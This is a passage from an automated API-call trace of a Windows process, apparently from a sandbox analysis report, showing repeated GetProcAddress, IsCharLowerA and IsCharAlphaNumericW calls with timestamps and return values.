lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.299] IsCharLowerA (ch=65) returned 0 [0013.299] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.299] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.299] IsCharLowerA (ch=66) returned 0 [0013.299] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.299] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.299] IsCharLowerA (ch=67) returned 0 [0013.299] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.299] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.299] IsCharLowerA (ch=68) returned 0 [0013.299] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.299] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.299] IsCharLowerA (ch=69) returned 0 [0013.299] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.299] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.299] IsCharLowerA (ch=70) returned 0 [0013.299] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.299] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.299] IsCharLowerA (ch=71) returned 0 [0013.299] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.299] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.299] IsCharLowerA (ch=72) returned 0 [0013.299] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.299] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.299] IsCharLowerA (ch=73) returned 0 [0013.299] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.299] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.299] IsCharLowerA (ch=74) returned 0 [0013.299] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.299] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.299] IsCharLowerA (ch=75) returned 0 [0013.299] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.299] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.299] IsCharLowerA (ch=76) returned 0 [0013.299] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.300] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.300] IsCharLowerA (ch=77) returned 0 [0013.300] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.300] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.300] IsCharLowerA (ch=78) returned 0 [0013.300] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.300] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.300] IsCharLowerA (ch=79) returned 0 [0013.300] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.300] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.300] IsCharLowerA (ch=80) returned 0 [0013.300] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.300] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.300] IsCharLowerA (ch=81) returned 0 [0013.300] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.300] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.300] IsCharLowerA (ch=82) returned 0 [0013.300] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.300] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.300] IsCharLowerA (ch=83) returned 0 [0013.300] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.300] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.300] IsCharLowerA (ch=84) returned 0 [0013.300] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.300] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.300] IsCharLowerA (ch=85) returned 0 [0013.300] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.300] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.300] IsCharLowerA (ch=86) returned 0 [0013.300] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.300] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.300] IsCharLowerA (ch=87) returned 0 [0013.300] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.300] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.300] IsCharLowerA (ch=88) returned 0 [0013.300] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.301] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.301] IsCharLowerA (ch=89) returned 0 [0013.301] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.301] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.301] IsCharLowerA (ch=65) returned 0 [0013.301] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.301] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.301] IsCharLowerA (ch=66) returned 0 [0013.301] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.301] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.301] IsCharLowerA (ch=67) returned 0 [0013.301] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.301] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.301] IsCharLowerA (ch=68) returned 0 [0013.301] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.301] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.301] IsCharLowerA (ch=69) returned 0 [0013.301] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.301] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.301] IsCharLowerA (ch=70) returned 0 [0013.301] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.301] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.301] IsCharLowerA (ch=71) returned 0 [0013.301] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.301] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.301] IsCharLowerA (ch=65) returned 0 [0013.301] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.301] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.301] IsCharLowerA (ch=66) returned 0 [0013.301] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.301] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.301] IsCharLowerA (ch=67) returned 0 [0013.301] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.301] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.301] IsCharLowerA (ch=68) returned 0 [0013.301] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.301] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.302] IsCharLowerA (ch=69) returned 0 [0013.302] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.302] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.302] IsCharLowerA (ch=70) returned 0 [0013.302] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.302] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.302] IsCharLowerA (ch=71) returned 0 [0013.302] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.302] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.302] IsCharLowerA (ch=72) returned 0 [0013.302] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.302] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.302] IsCharLowerA (ch=73) returned 0 [0013.302] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.302] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.302] IsCharLowerA (ch=74) returned 0 [0013.302] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.302] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.302] IsCharLowerA (ch=75) returned 0 [0013.302] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.302] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.302] IsCharLowerA (ch=76) returned 0 [0013.302] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.302] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.302] IsCharLowerA (ch=77) returned 0 [0013.302] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.302] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.302] IsCharLowerA (ch=78) returned 0 [0013.302] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.302] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.302] IsCharLowerA (ch=79) returned 0 [0013.302] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.302] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.302] IsCharLowerA (ch=80) returned 0 [0013.302] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.302] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.302] IsCharLowerA (ch=81) returned 0 [0013.302] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.303] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.303] IsCharLowerA (ch=82) returned 0 [0013.303] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.303] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.303] IsCharLowerA (ch=83) returned 0 [0013.303] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.303] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.303] IsCharLowerA (ch=84) returned 0 [0013.303] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.303] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.303] IsCharLowerA (ch=85) returned 0 [0013.303] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.303] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.303] IsCharLowerA (ch=86) returned 0 [0013.303] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.303] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.303] IsCharLowerA (ch=87) returned 0 [0013.303] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.303] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.303] IsCharLowerA (ch=88) returned 0 [0013.303] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.303] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.303] IsCharLowerA (ch=89) returned 0 [0013.303] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.303] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.303] IsCharLowerA (ch=65) returned 0 [0013.303] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.303] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.303] IsCharLowerA (ch=66) returned 0 [0013.303] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.303] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.303] IsCharLowerA (ch=67) returned 0 [0013.303] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.303] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.303] IsCharLowerA (ch=68) returned 0 [0013.303] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.304] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.304] IsCharLowerA (ch=69) returned 0 [0013.304] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.304] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.304] IsCharLowerA (ch=70) returned 0 [0013.304] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.304] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.304] IsCharLowerA (ch=71) returned 0 [0013.304] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.304] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.304] IsCharLowerA (ch=65) returned 0 [0013.304] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.304] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.304] IsCharLowerA (ch=66) returned 0 [0013.304] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.304] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.304] IsCharLowerA (ch=67) returned 0 [0013.304] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.304] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.304] IsCharLowerA (ch=68) returned 0 [0013.304] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.304] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.304] IsCharLowerA (ch=69) returned 0 [0013.304] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.304] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.304] IsCharLowerA (ch=70) returned 0 [0013.304] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.304] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.304] IsCharLowerA (ch=71) returned 0 [0013.304] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.304] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.304] IsCharLowerA (ch=72) returned 0 [0013.304] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.304] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.304] IsCharLowerA (ch=73) returned 0 [0013.304] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.304] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.305] IsCharLowerA (ch=74) returned 0 [0013.305] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.305] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.305] IsCharLowerA (ch=75) returned 0 [0013.305] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.305] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.305] IsCharLowerA (ch=76) returned 0 [0013.305] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.305] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.305] IsCharLowerA (ch=77) returned 0 [0013.305] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.305] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.305] IsCharLowerA (ch=78) returned 0 [0013.305] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.305] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.305] IsCharLowerA (ch=79) returned 0 [0013.305] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.305] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.305] IsCharLowerA (ch=80) returned 0 [0013.305] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.305] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.305] IsCharLowerA (ch=81) returned 0 [0013.305] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.305] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.305] IsCharLowerA (ch=82) returned 0 [0013.305] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.305] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.305] IsCharLowerA (ch=83) returned 0 [0013.305] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.305] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.305] IsCharLowerA (ch=84) returned 0 [0013.305] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.305] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.305] IsCharLowerA (ch=85) returned 0 [0013.305] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.305] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.305] IsCharLowerA (ch=86) returned 0 [0013.305] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.306] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.306] IsCharLowerA (ch=87) returned 0 [0013.306] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.306] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.306] IsCharLowerA (ch=88) returned 0 [0013.306] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.306] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.306] IsCharLowerA (ch=89) returned 0 [0013.306] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.306] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.306] IsCharLowerA (ch=65) returned 0 [0013.306] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.306] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.306] IsCharLowerA (ch=66) returned 0 [0013.306] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.306] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.306] IsCharLowerA (ch=67) returned 0 [0013.306] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.306] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.306] IsCharLowerA (ch=68) returned 0 [0013.306] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.306] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.306] IsCharLowerA (ch=69) returned 0 [0013.306] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.306] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.306] IsCharLowerA (ch=70) returned 0 [0013.306] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.306] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.306] IsCharLowerA (ch=71) returned 0 [0013.306] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.306] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.306] IsCharLowerA (ch=65) returned 0 [0013.306] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.306] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.306] IsCharLowerA (ch=66) returned 0 [0013.306] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.307] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.307] IsCharLowerA (ch=67) returned 0 [0013.307] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.307] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.307] IsCharLowerA (ch=68) returned 0 [0013.307] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.307] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.307] IsCharLowerA (ch=69) returned 0 [0013.307] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.307] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.307] IsCharLowerA (ch=70) returned 0 [0013.307] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.307] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.307] IsCharLowerA (ch=71) returned 0 [0013.307] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.307] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.307] IsCharLowerA (ch=72) returned 0 [0013.307] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.307] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.307] IsCharLowerA (ch=73) returned 0 [0013.307] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.307] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.307] IsCharLowerA (ch=74) returned 0 [0013.307] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.307] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.307] IsCharLowerA (ch=75) returned 0 [0013.307] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.307] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.307] IsCharLowerA (ch=76) returned 0 [0013.307] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.307] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.307] IsCharLowerA (ch=77) returned 0 [0013.307] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.307] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.307] IsCharLowerA (ch=78) returned 0 [0013.307] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.307] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.308] IsCharLowerA (ch=79) returned 0 [0013.308] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.308] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.308] IsCharLowerA (ch=80) returned 0 [0013.308] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.308] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.308] IsCharLowerA (ch=81) returned 0 [0013.308] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.308] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.308] IsCharLowerA (ch=82) returned 0 [0013.308] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.308] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.308] IsCharLowerA (ch=83) returned 0 [0013.308] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.308] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.308] IsCharLowerA (ch=84) returned 0 [0013.308] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.308] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.308] IsCharLowerA (ch=85) returned 0 [0013.308] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.308] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.308] IsCharLowerA (ch=86) returned 0 [0013.308] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.308] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.308] IsCharLowerA (ch=87) returned 0 [0013.308] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.308] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.308] IsCharLowerA (ch=88) returned 0 [0013.308] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.308] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.308] IsCharLowerA (ch=89) returned 0 [0013.308] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.308] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.308] IsCharLowerA (ch=65) returned 0 [0013.308] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.308] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.308] IsCharLowerA (ch=66) returned 0 [0013.308] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.309] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.309] IsCharLowerA (ch=67) returned 0 [0013.309] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.309] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.309] IsCharLowerA (ch=68) returned 0 [0013.309] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.309] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.309] IsCharLowerA (ch=69) returned 0 [0013.309] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.309] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.309] IsCharLowerA (ch=70) returned 0 [0013.309] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.309] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.309] IsCharLowerA (ch=71) returned 0 [0013.309] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.309] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.309] IsCharLowerA (ch=65) returned 0 [0013.309] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.309] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.309] IsCharLowerA (ch=66) returned 0 [0013.309] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.309] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.309] IsCharLowerA (ch=67) returned 0 [0013.309] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.309] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.309] IsCharLowerA (ch=68) returned 0 [0013.309] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.309] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.309] IsCharLowerA (ch=69) returned 0 [0013.309] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.309] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.309] IsCharLowerA (ch=70) returned 0 [0013.309] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.309] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.309] IsCharLowerA (ch=71) returned 0 [0013.309] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.310] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.310] IsCharLowerA (ch=72) returned 0 [0013.310] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.310] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.310] IsCharLowerA (ch=73) returned 0 [0013.310] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.310] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.310] IsCharLowerA (ch=74) returned 0 [0013.310] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.310] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.310] IsCharLowerA (ch=75) returned 0 [0013.310] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.310] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.310] IsCharLowerA (ch=76) returned 0 [0013.310] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.310] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 